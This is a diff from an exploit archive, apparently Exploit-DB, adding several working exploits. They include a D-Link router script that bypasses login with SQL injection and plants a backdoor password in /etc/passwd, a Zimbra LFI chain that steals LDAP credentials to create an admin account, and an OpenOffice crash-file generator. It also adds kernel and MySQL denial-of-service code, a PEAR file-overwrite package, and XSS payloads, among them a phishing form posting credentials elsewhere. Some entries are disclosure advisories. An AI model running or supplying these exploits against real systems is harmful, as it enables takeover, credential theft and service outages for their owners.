if pid > 0:
# Stopping the running telnetd
print "[+] Stopping telnetd (" + str(pid) + "): ",
sys.stdout.flush()
(h, d) = execCmd("kill " + str(pid))
pid = findPid(mystr1)
if pid > 0:
print "FAILURE"
sys.exit(-1)
else:
print "OK"
# Starting a new telnetd
print "[+] Starting telnetd: ",
sys.stdout.flush()
(h, d) = execCmd("telnetd -l " + mystr2)
pid = findPid("telnetd -l " + mystr2)
if pid > 0:
print "OK (" + str(pid) + ")"
else:
print "FAILURE"
sys.exit(-1)
def main():
global ipaddr, cookie, pid, bduser, bdpasswd
user = "admin"
passwd = "' or 'a'='a"
print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
print "This change is non-persistent to device reboots."
print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
# Logging into the router
print "[+] Trying to log into the router: ",
sys.stdout.flush()
(h, d) = login(user, passwd)
if d.find("User already logged in") > 0:
print "FAILURE"
print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
sys.exit(-1)
elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
while h:
(c1, c2) = h.pop()
if c1 == 'set-cookie':
cookie = c2
break
print "OK (" + cookie + ")"
elif d.find("Invalid username or password") > 0:
print "FAILURE"
print "[-] Invalid username or password"
sys.exit(-1)
else:
print "FAILURE"
print "[-] Unable to login."
sys.exit(-1)
# Starting a telnetd with custom parameters
print "[+] Preparing the hack..."
restartTelnetd("/bin/login", "/bin/sh")
# Do the h4cK
print "[+] Hacking the router..."
print "[+] Getting the backdoor user name: ",
sys.stdout.flush()
tn = telnetlib.Telnet(ipaddr.split(":")[0])
tn.read_very_eager()
tn.write("cat /etc/profile\n")
time.sleep(5)
data = tn.read_very_eager()
for i in data.split("\n"):
if i.find('"$USER"') > 0:
bduser = i.split('"')[3]
break
if len(bduser) > 0:
print "OK (" + bduser + ")"
else:
print "FAILURE"
sys.exit(-1)
print "[+] Setting the new password for " + bduser + ": ",
sys.stdout.flush()
tn.write("cat /etc/passwd\n")
time.sleep(5)
data = tn.read_very_eager()
data = data.split("\n")
data.reverse()
data.pop()
data.reverse()
data.pop()
data = "\n".join(data)
for i in data.split("\n"):
if i.find(bduser) >= 0:
line = i.split(':')
s1 = string.lowercase + string.uppercase + string.digits
salt = ''.join(random.sample(s1,2))
pw = crypt.crypt(bdpasswd, salt)
line[1] = pw
# doesn't work for some odd reason -- too lazy to find out why
#salt = ''.join(random.sample(s1,8))
#line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
data = data.replace(i, ":".join(line))
break
tn.write('echo -en "" > /etc/passwd\n')
time.sleep(5)
for i in data.split("\n"):
tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
time.sleep(1)
data = tn.read_very_eager()
tn.close()
if data.find(pw) >= 0:
print "OK (" + pw + ")"
success = True
else:
print "FAILURE"
print "[-] Could not set the new password."
sys.exit(-1)
# Switching back to the originals
print "[+] Mobbing up..."
restartTelnetd("/bin/sh", "/bin/login")
# Logging out
print "[+] Logging out: ",
sys.stdout.flush()
(h, d) = logout()
if d.find('value="Login"') > 0:
print "OK"
else:
print "FAILURE"
print "[-] Unable to determine if user is logged out."
# Print success message
if success:
print "[+] You can now log in via SSH and Telnet by using:"
print " user: " + bduser
print " pass: " + bdpasswd
print " These changes will be reverted upon router reboot."
print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent."
main()
sys.exit(0)

234
platforms/jsp/webapps/30054.txt Executable file
View file

@ -0,0 +1,234 @@
Document Title:
===============
Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1099
Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1099
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-27: Vendor Notification (DELL SonicWall Security Team)
2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team)
2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team)
2013-12-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: GMS Networks Appliance Application 7.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application.
The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent).
The persistent vulnerability is located in the `valfield_1` & `value_1` value parameters of the `Alert Settings` module POST method request.
Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp
appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert
settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values.
To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself
disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter & exception-handling.
The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system)
count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL).
The hotfix and information has been provided in cooperation with the vulnerability-laboratory.
Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent manipulation of vulnerable module context.
Vulnerable Application(s):
[+] DELL - SonicWall GMS v7.1.x Appliance Application
Vulnerable Module(s):
[+] Alert Settings > NewThreshold
Vulnerable File(s):
[+] createNewThreshold.jsp > ematStaticAlertTypes.jsp
Vulnerable Parameter(s):
[+] valfield_1
[+] value_1
Affected Module(s):
[+] createNewThreshold
[+] ematStaticAlertTypes
[+] Alert Settings - Main Listing
Affected Product(s):
[+] Dell SonicWALL GMS
[+] Dell SonicWALL Analyzer
[+] Dell SonicWALL UMA E5000
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged or restricted guest accounts and
low user interaction. For security demonstration or reproduce the vulnerability follow the information and steps below.
Location: Alert Settings
http://gms.localhost:8080/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Inject via Add: Edit contents for alert type: Backed-Up Syslog Files
http://gms.localhost:8080/sgms/ematStaticAlertTypes.jsp?
Execute: Create New Threshold
http://gms.localhost:8080/sgms/createNewThreshold.jsp?
Affected:
http://gms.localhost:8080/sgms/auth
Manual steps to reproduce ...
1. Open the Sonicwall GMS appliance application and login with full restrictions as guest
2. Switch to the vulnerable Console > Events > Alert Settings section
3. Click Add Alert and a new blank window of the application will be opened
4. Click in the upcomings window in the Alert Types section the Edit Content link
5. Now, a new window opens "Edit contents for alert type: Backup Sys-Log Files
6. On top is a little plus button next to the Threshold value
9. A new window opens with Elements box ... Inject your payload (script code) to the description eval in the operator fields
10. After the inject to the input fields the attacker only needs to click the Add Element button on the buttom of the page
11. The code will be directly executed and is persistent saved as element in the specific section
12. Save the input via update and go back to the alert settings main section were the code execute occurs in the same connected value
13. Successful reproduced!
PoC: Alert Settings - Create New Threshold
Critical</option></select> </td><td class="tblData2" width="1">
<img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td class="tblData2" align="center"
nowrap="nowrap"><input class="controlFont" name="disabled" value="1" type="checkbox"></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td>
<td class="tblData2" align="center" nowrap="nowrap"><a href="#" onclick="deleteElement(1);">
<img src="Create%20New%20Threshold_files/trash.gif" alt="Delete this destination" border="0"></a></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td></tr><tr><td></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td colspan="5"
class="tblData2" align="left" nowrap="nowrap"> <font class="controlfont">Description: </font>
<input class="controlfont" size="64" name="description"
value="is equal to >" <[PERSISTENT INJECTED SCRIPT CODE!]" type="text"> >"<[PERSISTENT INJECTED SCRIPT CODE!]">"
onkeyup="enableAutoDesc(1,0);"></td><td class="tblData2"
width=1><img src="images/1x1trans.gif"></td>
Note: Please, feel free to read also the patch information provided in the solution section of the advisory document.
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse, prevention filter mechanism or clean encode of the vulnerable value_1 and valfield_1 parameters.
Also restrict and escape the affected input field and output listing in the connected modules.
Resolution (DELL SonicWall):
We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability with filter bypass is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

11
platforms/linux/dos/30020.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23911/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
Versions prior to MySQL 5.0.40 are vulnerable.
SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)));

9
platforms/linux/dos/30024.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23927/info
The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows.
Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of an application using the vulnerable library. Failed attempts will likely result in denial-of-service conditions.
Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg

9
platforms/linux/dos/30044.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

39
platforms/linux/dos/30080.c Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
#include <sys/types.h>
#include <sys/ioctl.h>
#include <dirent.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
struct kernel_dirent {
long d_ino;
long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
#define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2])
#define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2])
int main(void)
{
int fd = open(".", O_RDONLY);
struct kernel_dirent de[2];
while (1) {
int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de);
if (i == -1) break;
if (de[0].d_reclen == 0) break;
printf("SFN: reclen=%2d off=%d ino=%d, %-12s",
de[0].d_reclen, de[0].d_off, de[0].d_ino, de[0].d_name);
if (de[1].d_reclen)
printf("\tLFN: reclen=%2d off=%d ino=%d, %s",
de[1].d_reclen, de[1].d_off, de[1].d_ino, de[1].d_name);
printf("\n");
}
return 0;
}

91
platforms/linux/dos/30091.py Executable file
View file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/24186/info
The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability.
Successful exploits may allow remote attackers to cause denial-of-service conditions on the webserver running the affected application.
OpenOffice 2.2.0 is vulnerable; other versions may also be affected.
import sys
import time
print "--------------------------------------------------------"
print " OpenOffice.org 2.2.0 Writer Denial of Service "
print " url: http://www.openoffice.org/ "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org "
print " "
print " If you want, you can change the file extension in .doc "
print "--------------------------------------------------------"
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"
while 1:
print " OPTIONS "
print " 1 -> Create file exploit.otp "
print " 2 -> Quit\n "
print "--------------------------------------------------------"
choice = 0
while 1:
try:
choice = int(raw_input("Make your choice: "))
if choice != 1 and choice != 2:
print "ehm... Invalid choice...\n"
else:
break
except:
print "ehm... Invalid choice...\n"
if choice == 1:
flag = 1
try:
fileOut = open('exploit.otp','w')
fileOut.write(exploit)
fileOut.close()
print "File created!\nBe safe!"
except:
print "Unable to create file."
if choice == 2:
print "Be safe!"
time.sleep(2)
sys.exit()

11
platforms/linux/local/30093.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24192/info
Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service.
# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)

6
platforms/linux/remote/29734.txt
View file

@ -91,6 +91,6 @@ Ruben Garrote Garc
rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com
EDB Note:
It seems 3.70 version has been patched against this.
Later versions are probably vulnerable to this.
## EDB Note:
# It seems 3.70 version currently available for download
# has been patched against this. Earlier versions are probably vulnerable to this.

14
platforms/linux/remote/30018.py Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23887/info
Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.
Exploiting this issue allows remote attackers to read portions of memory.
Python 2.4.4-2 and 2.5 are confirmed vulnerable.
#!/usr/bin/python
import locale
print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))

9
platforms/linux/remote/30043.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

70
platforms/linux/remote/30074.txt Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/24111/info
PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files.
An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations.
This issue affects PEAR 1.0 to 1.5.3.
create a file named "INSTALL" and save it in the current directory.
Save the following XML as package.xml, and run "pear install package.xml"
If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into
/usr/local/test.php
<?xml version="1.0" encoding="UTF-8"?>
<package version="2.0" xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Test_Sec</name>
<channel>pear.php.net</channel>
<summary>Test security vulnerability</summary>
<description>demonstrate install-as vulnerability
</description>
<lead>
<name>Greg Beaver</name>
<user>cellog</user>
<email>cellog@php.net</email>
<active>yes</active>
</lead>
<date>2007-03-05</date>
<version>
<release>1.6.0</release>
<api>1.6.0</api>
</version>
<stability>
<release>stable</release>
<api>stable</api>
</stability>
<license uri="http://www.php.net/license">PHP License</license>
<notes>
allow up to latest beta version [tias]
</notes>
<contents>
<dir name="/">
<file name="INSTALL" role="php" />
</dir> <!-- / -->
</contents>
<dependencies>
<required>
<php>
<min>4.3.0</min>
</php>
<pearinstaller>
<min>1.4.3</min>
</pearinstaller>
</required>
</dependencies>
<phprelease>
<filelist>
<install as="../../test.php" name="INSTALL" />
</filelist>
</phprelease>
</package>

9
platforms/linux/remote/30089.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24161/info
Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects Ruby on Rails 1.2.3; other versions may also be affected.
http://www.exploit-db.com/sploits/30089.tgz

59
platforms/linux/webapps/30085.txt Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
The number of servers vuln are huge like 80/100.
This is only for educational purpouses.

16
platforms/multiple/local/30039.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/23987/info
Multiple personal firewall products are prone to a vulnerability that lets attackers bypass protection mechanisms. This issue occurs because the applications fail to properly implement protection mechanisms based on valid process identifiers.
Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to the memory space of critical processes. This allows attackers to execute arbitrary code with elevated privileges; other attacks are also possible.
The following applications are vulnerable to this issue:
- Comodo Firewall Pro 2.4.18.184
- Comodo Personal Firewall 2.3.6.81
- ZoneAlarm Pro 6.1.744.001
Other applications and versions may also be affected.
http://www.exploit-db.com/sploits/30039-1.zip
http://www.exploit-db.com/sploits/30039-2.zip

9
platforms/multiple/remote/30025.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23933/info
TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected.
http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E

15
platforms/multiple/remote/30052.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/24058/info
Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following Tomcat versions are affected:
4.0.0 to 4.0.6
4.1.0 to 4.1.36
5.0.0 to 5.0.30
5.5.0 to 5.5.23
6.0.0 to 6.0.10
http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script>

20
platforms/multiple/remote/30078.js Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/24121/info
Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.
Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.
This issue affects Safari 2.0.4; other versions may also be affected.
var snoopWin;
function run() {
snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()", 5000);
}
function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 5000);
}

1
platforms/multiple/webapps/10821.txt
View file

@ -1,4 +1,3 @@
Application: WingFTP Server 3.2.4 (maybe earlier versions too)
Link: http://www.wftpserver.com/
Vulnerability: CSRF

11
platforms/osx/local/30096.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24208/info
Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
